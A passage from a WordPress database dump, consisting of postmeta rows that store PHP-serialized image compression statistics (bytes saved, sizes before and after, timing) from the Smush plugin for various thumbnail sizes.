\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.05999999999999960920149533194489777088165283203125;s:5:\"bytes\";i:563;s:11:\"size_before\";i:9291;s:10:\"size_after\";i:8728;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.29999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:2762;s:11:\"size_before\";i:37838;s:10:\"size_after\";i:35076;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.92999999999999971578290569595992565155029296875;s:5:\"bytes\";i:4442;s:11:\"size_before\";i:56014;s:10:\"size_after\";i:51572;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.9900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:560;s:11:\"size_before\";i:9345;s:10:\"size_after\";i:8785;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.54999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:1486;s:11:\"size_before\";i:22681;s:10:\"size_after\";i:21195;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.79999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:2382;s:11:\"size_before\";i:35045;s:10:\"size_after\";i:32663;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4314,2017,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:11.970987853647631737885603797622025012969970703125;s:5:\"bytes\";i:24097;s:11:\"size_before\";i:201295;s:10:\"size_after\";i:177198;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.8699999999999992184029906638897955417633056640625;s:5:\"bytes\";i:609;s:11:\"size_before\";i:5132;s:10:\"size_after\";i:4523;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.449999999999999289457264239899814128875732421875;s:5:\"bytes\";i:987;s:11:\"size_before\";i:10447;s:10:\"size_after\";i:9460;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.050000000000000710542735760100185871124267578125;s:5:\"bytes\";i:5309;s:11:\"size_before\";i:44061;s:10:\"size_after\";i:38752;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.6400000000000005684341886080801486968994140625;s:5:\"bytes\";i:8363;s:11:\"size_before\";i:66169;s:10:\"size_after\";i:57806;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.1500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:931;s:11:\"size_before\";i:10175;s:10:\"size_after\";i:9244;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.550000000000000710542735760100185871124267578125;s:5:\"bytes\";i:3287;s:11:\"size_before\";i:26198;s:10:\"size_after\";i:22911;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.78999999999999914734871708787977695465087890625;s:5:\"bytes\";i:4611;s:11:\"size_before\";i:39113;s:10:\"size_after\";i:34502;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4315,2016,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:13.4007182924339058871510133030824363231658935546875;s:5:\"bytes\";i:22313;s:11:\"size_before\";i:166506;s:10:\"size_after\";i:144193;s:4:\"time\";d:0.09999999999999999167332731531132594682276248931884765625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.96000000000000085265128291212022304534912109375;s:5:\"bytes\";i:639;s:11:\"size_before\";i:4579;s:10:\"size_after\";i:3940;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:918;s:11:\"size_before\";i:8910;s:10:\"size_after\";i:7992;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.050000000000000710542735760100185871124267578125;s:5:\"bytes\";i:5259;s:11:\"size_before\";i:37442;s:10:\"size_after\";i:32183;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.32000000000000028421709430404007434844970703125;s:5:\"bytes\";i:7819;s:11:\"size_before\";i:54613;s:10:\"size_after\";i:46794;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.9900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:943;s:11:\"size_before\";i:8578;s:10:\"size_after\";i:7635;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.7200000000000006394884621840901672840118408203125;s:5:\"bytes\";i:2640;s:11:\"size_before\";i:20757;s:10:\"size_after\";i:18117;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.949999999999999289457264239899814128875732421875;s:5:\"bytes\";i:4095;s:11:\"size_before\";i:31627;s:10:\"size_after\";i:27532;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4316,2015,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:31.326376753998914637122652493417263031005859375;s:5:\"bytes\";i:214409;s:11:\"size_before\";i:684436;s:10:\"size_after\";i:470027;s:4:\"time\";d:4.20999999999999996447286321199499070644378662109375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:26.07000000000000028421709430404007434844970703125;s:5:\"bytes\";i:4391;s:11:\"size_before\";i:16840;s:10:\"size_after\";i:12449;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:28.82000000000000028421709430404007434844970703125;s:5:\"bytes\";i:7925;s:11:\"size_before\";i:27499;s:10:\"size_after\";i:19574;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:32.78999999999999914734871708787977695465087890625;s:5:\"bytes\";i:55140;s:11:\"size_before\";i:168174;s:10:\"size_after\";i:113034;s:4:\"time\";d:1.1100000000000000976996261670137755572795867919921875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:28.699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:59298;s:11:\"size_before\";i:206613;s:10:\"size_after\";i:147315;s:4:\"time\";d:1.1599999999999999200639422269887290894985198974609375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:28.660000000000000142108547152020037174224853515625;s:5:\"bytes\";i:7475;s:11:\"size_before\";i:26085;s:10:\"size_after\";i:18610;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:32.6700000000000017053025658242404460906982421875;s:5:\"bytes\";i:28254;s:11:\"size_before\";i:86476;s:10:\"size_after\";i:58222;s:4:\"time\";d:0.5100000000000000088817841970012523233890533447265625;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:33.99000000000000198951966012828052043914794921875;s:5:\"bytes\";i:51926;s:11:\"size_before\";i:152749;s:10:\"size_after\";i:100823;s:4:\"time\";d:1.12000000000000010658141036401502788066864013671875;}}}'),(4317,2014,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:11.1239528863455916507518850266933441162109375;s:5:\"bytes\";i:23677;s:11:\"size_before\";i:212847;s:10:\"size_after\";i:189170;s:4:\"time\";d:0.1299999999999999766853164828717126511037349700927734375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.660000000000000142108547152020037174224853515625;s:5:\"bytes\";i:677;s:11:\"size_before\";i:5804;s:10:\"size_after\";i:5127;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.5299999999999993605115378159098327159881591796875;s:5:\"bytes\";i:1010;s:11:\"size_before\";i:10602;s:10:\"size_after\";i:9592;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.8599999999999994315658113919198513031005859375;s:5:\"bytes\";i:5054;s:11:\"size_before\";i:46527;s:10:\"size_after\";i:41473;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.7799999999999993605115378159098327159881591796875;s:5:\"bytes\";i:8177;s:11:\"size_before\";i:69432;s:10:\"size_after\";i:61255;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.8699999999999992184029906638897955417633056640625;s:5:\"bytes\";i:928;s:11:\"size_before\";i:10459;s:10:\"size_after\";i:9531;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.8100000000000004973799150320701301097869873046875;s:5:\"bytes\";i:2931;s:11:\"size_before\";i:27110;s:10:\"size_after\";i:24179;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.4199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:4900;s:11:\"size_before\";i:42913;s:10:\"size_after\";i:38013;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4318,2011,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:8.640192703806857110748751438222825527191162109375;s:5:\"bytes\";i:12626;s:11:\"size_before\";i:146131;s:10:\"size_after\";i:133505;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.12999999999999989341858963598497211933135986328125;s:5:\"bytes\";i:305;s:11:\"size_before\";i:5944;s:10:\"size_after\";i:5639;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.38999999999999968025576890795491635799407958984375;s:5:\"bytes\";i:441;s:11:\"size_before\";i:6901;s:10:\"size_after\";i:6460;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.6899999999999995026200849679298698902130126953125;s:5:\"bytes\";i:2336;s:11:\"size_before\";i:26868;s:10:\"size_after\";i:24532;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.0999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:4299;s:11:\"size_before\";i:42583;s:10:\"size_after\";i:38284;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.12999999999999989341858963598497211933135986328125;s:5:\"bytes\";i:667;s:11:\"size_before\";i:9349;s:10:\"size_after\";i:8682;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.230000000000000426325641456060111522674560546875;s:5:\"bytes\";i:1765;s:11:\"size_before\";i:21456;s:10:\"size_after\";i:19691;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.519999999999999573674358543939888477325439453125;s:5:\"bytes\";i:2813;s:11:\"size_before\";i:33030;s:10:\"size_after\";i:30217;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4319,2010,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:9.8501998628772486910065708798356354236602783203125;s:5:\"bytes\";i:15229;s:11:\"size_before\";i:154606;s:10:\"size_after\";i:139377;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.4399999999999995026200849679298698902130126953125;s:5:\"bytes\";i:444;s:11:\"size_before\";i:5261;s:10:\"size_after\";i:4817;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.8300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:606;s:11:\"size_before\";i:7735;s:10:\"size_after\";i:7129;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.0099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:3128;s:11:\"size_before\";i:31246;s:10:\"size_after\";i:28118;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.07000000000000028421709430404007434844970703125;s:5:\"bytes\";i:5709;s:11:\"size_before\";i:51567;s:10:\"size_after\";i:45858;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.71000000000000085265128291212022304534912109375;s:5:\"bytes\";i:717;s:11:\"size_before\";i:8231;s:10:\"size_after\";i:7514;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.9399999999999995026200849679298698902130126953125;s:5:\"bytes\";i:1810;s:11:\"size_before\";i:20241;s:10:\"size_after\";i:18431;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.2799999999999993605115378159098327159881591796875;s:5:\"bytes\";i:2815;s:11:\"size_before\";i:30325;s:10:\"size_after\";i:27510;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4320,1977,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:22.448316213756339010387819143943488597869873046875;s:5:\"bytes\";i:41436;s:11:\"size_before\";i:184584;s:10:\"size_after\";i:143148;s:4:\"time\";d:0.8000000000000000444089209850062616169452667236328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.1099999999999994315658113919198513031005859375;s:5:\"bytes\";i:2952;s:11:\"size_before\";i:17249;s:10:\"size_after\";i:14297;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.14999999999999857891452847979962825775146484375;s:5:\"bytes\";i:8899;s:11:\"size_before\";i:42070;s:10:\"size_after\";i:33171;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.4200000000000017053025658242404460906982421875;s:5:\"bytes\";i:6633;s:11:\"size_before\";i:32481;s:10:\"size_after\";i:25848;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:24.739999999999998436805981327779591083526611328125;s:5:\"bytes\";i:22952;s:11:\"size_before\";i:92784;s:10:\"size_after\";i:69832;s:4:\"time\";d:0.450000000000000011102230246251565404236316680908203125;}}}'),(4321,1976,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:25.089347637804422674889792688190937042236328125;s:5:\"bytes\";i:75607;s:11:\"size_before\";i:301351;s:10:\"size_after\";i:225744;s:4:\"time\";d:0.68000000000000004884981308350688777863979339599609375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.85000000000000142108547152020037174224853515625;s:5:\"bytes\";i:3035;s:11:\"size_before\";i:18009;s:10:\"size_after\";i:14974;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.160000000000000142108547152020037174224853515625;s:5:\"bytes\";i:2408;s:11:\"size_before\";i:33614;s:10:\"size_after\";i:31206;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.769999999999999573674358543939888477325439453125;s:5:\"bytes\";i:2917;s:11:\"size_before\";i:33260;s:10:\"size_after\";i:30343;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.6700000000000017053025658242404460906982421875;s:5:\"bytes\";i:19807;s:11:\"size_before\";i:118833;s:10:\"size_after\";i:99026;s:4:\"time\";d:0.270000000000000017763568394002504646778106689453125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:48.590000000000003410605131648480892181396484375;s:5:\"bytes\";i:47440;s:11:\"size_before\";i:97635;s:10:\"size_after\";i:50195;s:4:\"time\";d:0.2399999999999999911182158029987476766109466552734375;}}}'),(4322,1960,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:25.089347637804422674889792688190937042236328125;s:5:\"bytes\";i:75607;s:11:\"size_before\";i:301351;s:10:\"size_after\";i:225744;s:4:\"time\";d:0.75;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.85000000000000142108547152020037174224853515625;s:5:\"bytes\";i:3035;s:11:\"size_before\";i:18009;s:10:\"size_after\";i:14974;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.160000000000000142108547152020037174224853515625;s:5:\"bytes\";i:2408;s:11:\"size_before\";i:33614;s:10:\"size_after\";i:31206;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.769999999999999573674358543939888477325439453125;s:5:\"bytes\";i:2917;s:11:\"size_before\";i:33260;s:10:\"size_after\";i:30343;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.6700000000000017053025658242404460906982421875;s:5:\"bytes\";i:19807;s:11:\"size_before\";i:118833;s:10:\"size_after\";i:99026;s:4:\"time\";d:0.36999999999999999555910790149937383830547332763671875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:48.590000000000003410605131648480892181396484375;s:5:\"bytes\";i:47440;s:11:\"size_before\";i:97635;s:10:\"size_after\";i:50195;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}}}'),(4323,1948,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:196680;s:10:\"size_after\";i:196680;s:4:\"time\";d:0.47000000000000008437694987151189707219600677490234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:26422;s:10:\"size_after\";i:26422;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:68157;s:10:\"size_after\";i:68157;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:33944;s:10:\"size_after\";i:33944;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:68157;s:10:\"size_after\";i:68157;s:4:\"time\";d:0.1700000000000000122124532708767219446599483489990234375;}}}'),(4324,1942,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:17.2218970872912251479647238738834857940673828125;s:5:\"bytes\";i:15302;s:11:\"size_before\";i:88852;s:10:\"size_after\";i:73550;s:4:\"time\";d:0.5300000000000000266453525910037569701671600341796875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.739999999999998436805981327779591083526611328125;s:5:\"bytes\";i:3444;s:11:\"size_before\";i:15146;s:10:\"size_after\";i:11702;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.980000000000000426325641456060111522674560546875;s:5:\"bytes\";i:1869;s:11:\"size_before\";i:11695;s:10:\"size_after\";i:9826;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:28.510000000000001563194018672220408916473388671875;s:5:\"bytes\";i:6865;s:11:\"size_before\";i:24083;s:10:\"size_after\";i:17218;s:4:\"time\";d:0.1700000000000000122124532708767219446599483489990234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.660000000000000142108547152020037174224853515625;s:5:\"bytes\";i:817;s:11:\"size_before\";i:12261;s:10:\"size_after\";i:11444;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.9900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:2307;s:11:\"size_before\";i:25667;s:10:\"size_after\";i:23360;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}}}'),(4325,1932,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:3.31161292873239343492741681984625756740570068359375;s:5:\"bytes\";i:9214;s:11:\"size_before\";i:278233;s:10:\"size_after\";i:269019;s:4:\"time\";d:0.2600000000000000088817841970012523233890533447265625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.5800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:1836;s:11:\"size_before\";i:27883;s:10:\"size_after\";i:26047;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.91000000000000003108624468950438313186168670654296875;s:5:\"bytes\";i:686;s:11:\"size_before\";i:75334;s:10:\"size_after\";i:74648;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.450000000000000011102230246251565404236316680908203125;s:5:\"bytes\";i:240;s:11:\"size_before\";i:53383;s:10:\"size_after\";i:53143;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.29999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:6452;s:11:\"size_before\";i:121633;s:10:\"size_after\";i:115181;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}}}'),(4326,1931,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:149436;s:10:\"size_after\";i:149436;s:4:\"time\";d:0.39000000000000001332267629550187848508358001708984375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:15208;s:10:\"size_after\";i:15208;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:44743;s:10:\"size_after\";i:44743;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:33888;s:10:\"size_after\";i:33888;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:55597;s:10:\"size_after\";i:55597;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}}}'),(4327,1929,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:1.50544623954425826894976125913672149181365966796875;s:5:\"bytes\";i:3335;s:11:\"size_before\";i:221529;s:10:\"size_after\";i:218194;s:4:\"time\";d:0.440000000000000002220446049250313080847263336181640625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.1699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:747;s:11:\"size_before\";i:23550;s:10:\"size_after\";i:22803;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:61630;s:10:\"size_after\";i:61630;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:40597;s:10:\"size_after\";i:40597;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.70000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:2588;s:11:\"size_before\";i:95752;s:10:\"size_after\";i:93164;s:4:\"time\";d:0.2300000000000000099920072216264088638126850128173828125;}}}'),(4328,1928,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:10.0631042272435013984477336634881794452667236328125;s:5:\"bytes\";i:35370;s:11:\"size_before\";i:351482;s:10:\"size_after\";i:316112;s:4:\"time\";d:0.2399999999999999911182158029987476766109466552734375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:8310;s:11:\"size_before\";i:39192;s:10:\"size_after\";i:30882;s: